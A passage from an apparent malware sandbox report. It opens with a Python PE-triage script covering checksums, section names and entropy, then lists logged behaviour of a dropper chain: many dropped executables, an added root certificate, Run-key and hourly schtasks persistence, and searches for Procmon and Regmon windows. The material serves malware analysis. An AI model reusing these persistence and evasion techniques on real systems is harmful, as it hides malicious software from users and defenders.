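

def triage(data: bytes, now=None) -> list:
    """Findings worded like the report's 'Static PE information' lines."""
    now = now or datetime.now(timezone.utc)
    stored, ts, sections = parse_pe(data)
    computed = pe_checksum(data)
    findings = []
    if stored != computed:                  # a zero field means the linker never set it
        findings.append(f"real checksum: 0x{stored:x} should be: 0x{computed:x}")
    built = datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=ts)
    if built > now:
        findings.append(f"timestamp in the future: {built:%a %b %d %H:%M:%S %Y} UTC")
    for name, raw in sections:
        if not name:
            findings.append("unnamed section")
        elif name in PACKER_SECTIONS:
            findings.append(f"packer section name: {name}")
        elif name not in COMMON_SECTIONS and name.isalpha() and name.islower():
            findings.append(f"random-looking section name: {name}")
        ent = shannon_entropy(raw)
        if ent > HIGH_ENTROPY:
            findings.append(f"section {name!r} entropy: {ent:.2f}")
    return findings


def build_sample_pe(sections, timestamp, checksum=0) -> bytes:
    """Constructed minimal PE32: DOS header, NT headers, section table, raw section data."""
    file_align = 0x200
    hdr_len = -(-(0x40 + 4 + 20 + 224 + 40 * len(sections)) // file_align) * file_align
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                       # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, 224, 0x0102)
    opt = bytearray(224)                                          # PE32 optional header
    for off, fmt, val in ((0, "<H", 0x10B), (16, "<I", 0x1000), (28, "<I", 0x400000),
                          (32, "<I", 0x1000), (36, "<I", file_align), (60, "<I", hdr_len),
                          (64, "<I", checksum), (68, "<H", 2), (92, "<I", 16)):
        struct.pack_into(fmt, opt, off, val)
    table, raw, raw_ptr, va = b"", b"", hdr_len, 0x1000
    for name, body, flags in sections:
        raw_size = -(-len(body) // file_align) * file_align
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(body), va, raw_size,
                             raw_ptr, 0, 0, 0, 0, flags)
        raw += body.ljust(raw_size, b"\0")
        raw_ptr, va = raw_ptr + raw_size, va + max(0x1000, -(-len(body) // 0x1000) * 0x1000)
    return (bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + table).ljust(hdr_len, b"\0") + raw


SAMPLE_SECTIONS = [                                   # constructed content, not the malware's
    (".text", b"\x55\x8b\xec\x90" * 64, 0x60000020),  # code-like, low entropy
    ("", bytes(range(256)) * 4, 0xE0000040),          # unnamed, RWX, uniform byte histogram
    ("agovwish", bytes(range(256)) * 2, 0xE0000040),  # random 8-letter name, RWX
    (".themida", b"\0" * 64, 0xE0000040),             # packer section name
]
SAMPLE_PE = build_sample_pe(SAMPLE_SECTIONS, timestamp=0xFC177629)   # Jan 10 2104, as in the report

if __name__ == "__main__":
    for line in triage(SAMPLE_PE):
        print("Static PE information:", line)
```

Running the block prints one line per finding in the report's wording. The checksum routine is the part worth keeping: a stored value of 0 with a non-zero recomputation (the cred64.dll, clip64.dll, NewB.exe and gold.exe cases above) means the PE was written by a tool that never called CheckSumMappedFile, which legitimate linkers and signing pipelines do; a non-zero stored value that still mismatches (amert.exe, MPGPH131.exe, swiiiii.exe) means the file was modified after linking, typically by a packer appending or rewriting sections.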

Persistence and Installation Behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\gX4d2ArXDOHTjofk9CfRb7Jz.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\5nFKWr1EKUheiDEHo671vxm8.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u6po.0.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\QbkKvIT5uJj3Cx8h0ECIsmUK.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe File created: C:\Users\user\AppData\Local\Temp\u6po.2\ASUS_WMI.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe File created: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\gold[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ISetup8[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe File created: C:\ProgramData\MPGPH131\MPGPH131.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\jok[1].exe
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe File created: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\9WrQ2c2u5fxH1pcvCwwjGhdd.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\gPQjkT7jjoMSIv7cXyWMW1C4.exe
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\toolspub1[1].exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\C893DEcM3dAA247WrHBz1SDW.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\oqwWhViccQzmDvkS751EZRiG.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\CmCQsbfi77SnYQWckHTzUjRg.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\laQhqKepZhfkS5rQoYOvKJAy.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\g81RdhkO8Pp47pz1l8siHWuN.exe
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\pScZMSZH0uu2OkUDvWpN2tuz.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\dmmb0z6yJ22pC75a4y49Nfob.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\mBoc1pbzy7gOQT20pyEZL3en.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\1NXbTL9dcUCk55eVv5KRJhmL.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\cred64[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\oXA3lyE6zGyLyvw1CwVKpLsf.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\gmHwlMZnGawtAwStcAU6D1RM.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\NN7y6Ml4QHJBCfpeCmt1XQq3.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\swiiii[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\0co9idnjzay1KSn3DMfCsBSw.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\ULDq5mjQ4b5aNI3V4eIJfMVS.exe
Source: C:\Users\user\Desktop\1CMweaqlKp.exe File created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe File created: C:\Users\user\AppData\Local\Temp\u6po.0.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\GIz2DLitsyoTn14REJti2nqN.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\evHtDP9yDvs3XYDQg8lqEVoH.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\qPQ3lJ1fN9DRgfiXtyMpf1ll.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Aghrmi42Lz5QvS8u8U6BiVXQ.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\11xbcpylNeYY4tZ39QN34xGC.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000079001\gold.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\iFyHzFXRkeOppMlu3FtGrLYy.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\QcyIEuk7gD7wTlhElB94jgu9.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\tAKreBGDuozTwXSZfhU7cFT3.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\3N5jWnvXHqfYUsxTijnW3Uc5.exe
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\4767d2e713f2021e8fe856e3ea638b58[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\H3bqnZf96LFIOlogieo3h5K9.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\i8dOWYOLtbNAxDJGOQ8Wt9el.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000080001\alexxxxxxxx.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\v3efLAgS1BVue6uNuzFECLaH.exe
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe File created: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\5LzADXbR9e1baIzvWufsCa70.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\xF7m0A44x6KodDxbhAtiDsub.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\X53t1QSznpDGsvX2qLbdQFD1.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Osh3JGbyB69u4I6NltayynfD.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\install[1].exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\swiiiii[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\MtYY7PxoMVCDp1NJbYQga2LV.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\jzMGE9Xb2Ny8jtCWlXWAk3ap.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\de4IGlGSbV9c3J4m0qZtBGm8.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\aYtr3HT3BUqjK6QB6WYpwCcm.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\zWIy5Pdf1kgq9YulaqIKrGGy.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\JcuJCrKoIRAAJIb94uRnhVjr.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Z0V3bHdPFsglc9f9uLbxOZFN.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\9SmQs0R4T5RJUISklvcv02zp.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\leqbtljZtxj2WxVvdmpHiNsI.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\ppcQqLgPI8Dyy7YykX33fm5x.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\S41vy8IsPU7Iudry37c4uNtg.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000081001\install.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe File created: C:\Users\user\AppData\Local\Temp\1000236001\4767d2e713f2021e8fe856e3ea638b58.exe
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe File created: C:\Users\user\AppData\Local\Temp\u6po.2\AsIO.dll
Source: C:\Users\user\AppData\Local\Temp\u6po.0.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sarra[1].exe
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amert[1].exe
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe File created: C:\Users\user\AppData\Local\Temp\u6po.2\ATKEX.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\jfesawdr[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\STUD4CnDuvZtXsKBuBkO31id.exe
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe File created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\M4OBi0ywNcuUZRFLcfJ70nUH.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\iO9tAKw78L31Wsbvnq5kt5m1.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\8sXk5E4IG9n4ZHu2M9Littnp.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\f2NBhcBIObRGHagt6xPQoMa2.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\gjVUxsTFUgOAjApkeCU52nGD.exe
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe File created: C:\Users\user\1000021002\ac861238af.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\NewB[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\rVg8HtIzXa4xhJHL7Pn8A6d2.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Bkg8NSHXvizTVBsjT3dzRvci.exe
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\v6zcDFD3cRDhmr34kNKDn8tX.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\Jr1vIs8XqAmt0RT7bHMte8ts.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\gKIISy7hixfPFGDeeM7cQzit.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\SjGlviky3CjPwV1vWXl2gdhJ.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\D7t23m0X26bEkZqkCQtNwK5Y.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\s8YO7ScTlLADC9Vt6wr10aY4.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\PHoZl3WswCZ1lCRWCJPBFZtN.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\pl49PSFkcWVTQqBe8TA2VhRW.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\alexxxxxxxx[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\7iI5SUAnqRGyB1YdSAO06W1v.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\file300un[1].exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000077001\jfesawdr.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\gzxs1MlpU5tnMfkC7kzgvR1h.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\5W1aDm1vpFLN4gyrIiISMc4h.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\LIdx8BlqmZTW07MQOtXboF4f.exe
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe File created: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\KHojJ9v7XtNSHZfW6gAnnH23.exe
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe File created: C:\ProgramData\MPGPH131\MPGPH131.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ac861238af.exe
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d361f35322.exe
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Desktop\1CMweaqlKp.exe File created: C:\Windows\Tasks\explorta.job

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000021002\ac861238af.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
